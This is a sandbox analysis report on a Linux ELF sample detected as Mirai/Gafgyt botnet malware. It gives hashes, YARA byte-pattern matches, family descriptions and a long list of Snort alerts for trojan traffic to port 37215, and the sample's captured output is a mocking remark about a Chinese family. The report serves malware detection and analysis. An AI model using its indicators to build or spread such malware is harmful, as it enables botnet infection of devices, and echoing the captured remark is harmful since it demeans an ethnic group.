Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
hj3msRLZgi.elf

Overview

General Information

Sample name:hj3msRLZgi.elf
renamed because original name is a hash value
Original sample name:e934abd4bf5004524b803aaf44a23dee.elf
Analysis ID:1457161
MD5:e934abd4bf5004524b803aaf44a23dee
SHA1:5dc17c7fca23839f03b8d5af8407c4b07421ea28
SHA256:ed9f13295666b6434ad76d60f7fe6b92c438db662468ffd9611db18841143317
Tags:32elfgafgytintel
Infos:

Detection

Mirai, Gafgyt
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Gafgyt
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Contains symbols with names commonly found in malware
Machine Learning detection for sample
Opens /proc/net/* files useful for finding connected devices and routers
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are user agent strings indicative of HTTP manipulation
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1457161
Start date and time:2024-06-14 10:42:38 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 51s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:hj3msRLZgi.elf
renamed because original name is a hash value
Original Sample Name:e934abd4bf5004524b803aaf44a23dee.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/0@2/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/hj3msRLZgi.elf
PID:5498
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate alot
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
SourceRuleDescriptionAuthorStrings
hj3msRLZgi.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    hj3msRLZgi.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      hj3msRLZgi.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        hj3msRLZgi.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          hj3msRLZgi.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x10cbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10cd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10ce4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10cf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10d98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10dac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10dc0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10dd4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10de8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10dfc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10e10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10e24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10e38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x10e4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          5498.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5498.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
              5498.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                5498.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
                • 0x10cbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10cd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10ce4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10cf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10d98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10dac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10dc0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10dd4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10de8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10dfc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10e10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10e24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10e38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                • 0x10e4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                5498.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Gafgyt_c573932bunknownunknown
                • 0x1fdd:$a: 83 7D 18 00 74 22 8B 45 1C 83 E0 02 85 C0 74 18 83 EC 08 6A 2D FF
                Click to see the 55 entries
                Timestamp:06/14/24-10:44:33.149140
                SID:2835222
                Source Port:53894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181929
                SID:2835222
                Source Port:53762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470727
                SID:2835222
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022201
                SID:2829579
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661691
                SID:2829579
                Source Port:37936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132407
                SID:2835222
                Source Port:49760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728310
                SID:2829579
                Source Port:44884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184678
                SID:2835222
                Source Port:44118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028318
                SID:2829579
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860010
                SID:2835222
                Source Port:44924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702134
                SID:2829579
                Source Port:44650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518603
                SID:2829579
                Source Port:40814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179418
                SID:2835222
                Source Port:41180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791298
                SID:2829579
                Source Port:54608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517331
                SID:2835222
                Source Port:40106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861589
                SID:2835222
                Source Port:49432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521546
                SID:2835222
                Source Port:35756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715339
                SID:2835222
                Source Port:58560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735154
                SID:2835222
                Source Port:60950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386232
                SID:2835222
                Source Port:35510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564279
                SID:2829579
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224891
                SID:2835222
                Source Port:53522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453695
                SID:2829579
                Source Port:37710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184924
                SID:2829579
                Source Port:43090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943209
                SID:2835222
                Source Port:56648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290738
                SID:2829579
                Source Port:42482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986238
                SID:2835222
                Source Port:47364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645416
                SID:2835222
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661622
                SID:2835222
                Source Port:51980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806896
                SID:2829579
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703489
                SID:2829579
                Source Port:47716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660818
                SID:2835222
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419567
                SID:2835222
                Source Port:35256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915343
                SID:2829579
                Source Port:59012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164703
                SID:2835222
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011512
                SID:2829579
                Source Port:54734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244271
                SID:2829579
                Source Port:57110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999448
                SID:2829579
                Source Port:48948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.147929
                SID:2829579
                Source Port:36384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967393
                SID:2829579
                Source Port:49940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321789
                SID:2835222
                Source Port:43968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878851
                SID:2829579
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182925
                SID:2829579
                Source Port:53412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542917
                SID:2829579
                Source Port:60524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990936
                SID:2829579
                Source Port:57054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977199
                SID:2829579
                Source Port:55100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052342
                SID:2835222
                Source Port:38156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791265
                SID:2835222
                Source Port:55218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115248
                SID:2829579
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326317
                SID:2835222
                Source Port:50482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861492
                SID:2829579
                Source Port:48506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146587
                SID:2835222
                Source Port:40658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471333
                SID:2829579
                Source Port:37712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470989
                SID:2835222
                Source Port:56630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568295
                SID:2835222
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812857
                SID:2829579
                Source Port:54212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896269
                SID:2835222
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384036
                SID:2829579
                Source Port:44588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548173
                SID:2835222
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666331
                SID:2829579
                Source Port:41534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563999
                SID:2835222
                Source Port:41370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519013
                SID:2829579
                Source Port:41726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151765
                SID:2835222
                Source Port:52366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243420
                SID:2829579
                Source Port:44596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677782
                SID:2829579
                Source Port:48900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424912
                SID:2835222
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678880
                SID:2835222
                Source Port:36476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382719
                SID:2829579
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134625
                SID:2829579
                Source Port:58596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729850
                SID:2829579
                Source Port:42018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762143
                SID:2829579
                Source Port:50158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019184
                SID:2829579
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850762
                SID:2829579
                Source Port:43918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019460
                SID:2835222
                Source Port:58424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671694
                SID:2835222
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025040
                SID:2829579
                Source Port:51460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290678
                SID:2835222
                Source Port:59996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032642
                SID:2835222
                Source Port:59926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228841
                SID:2829579
                Source Port:55344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899108
                SID:2829579
                Source Port:49590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668602
                SID:2835222
                Source Port:40776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862414
                SID:2829579
                Source Port:58772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565233
                SID:2829579
                Source Port:60714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683463
                SID:2835222
                Source Port:45670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563201
                SID:2829579
                Source Port:53222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472235
                SID:2835222
                Source Port:60358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326726
                SID:2829579
                Source Port:37044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504985
                SID:2835222
                Source Port:39830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452430
                SID:2835222
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732972
                SID:2829579
                Source Port:49242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849228
                SID:2829579
                Source Port:41734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549517
                SID:2835222
                Source Port:56680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985208
                SID:2835222
                Source Port:33732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092965
                SID:2829579
                Source Port:36968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861815
                SID:2835222
                Source Port:35176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880074
                SID:2835222
                Source Port:57654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861960
                SID:2829579
                Source Port:54838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703953
                SID:2835222
                Source Port:40892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470877
                SID:2829579
                Source Port:44100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685208
                SID:2829579
                Source Port:47554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776994
                SID:2829579
                Source Port:52560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701740
                SID:2829579
                Source Port:52984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732651
                SID:2835222
                Source Port:52574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687577
                SID:2829579
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034598
                SID:2829579
                Source Port:52536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985454
                SID:2835222
                Source Port:46634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779772
                SID:2835222
                Source Port:53728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898031
                SID:2835222
                Source Port:49802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917975
                SID:2835222
                Source Port:60596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274813
                SID:2835222
                Source Port:50410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381776
                SID:2835222
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132119
                SID:2835222
                Source Port:44366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368177
                SID:2835222
                Source Port:34912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385013
                SID:2829579
                Source Port:36904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735238
                SID:2829579
                Source Port:56892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022302
                SID:2829579
                Source Port:57448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717895
                SID:2829579
                Source Port:38404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722182
                SID:2835222
                Source Port:57080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789260
                SID:2835222
                Source Port:51900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324245
                SID:2829579
                Source Port:50744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227948
                SID:2835222
                Source Port:33524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228418
                SID:2835222
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342745
                SID:2829579
                Source Port:49750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177242
                SID:2835222
                Source Port:52566
                Destination Port:37215
                Protocol:TCP
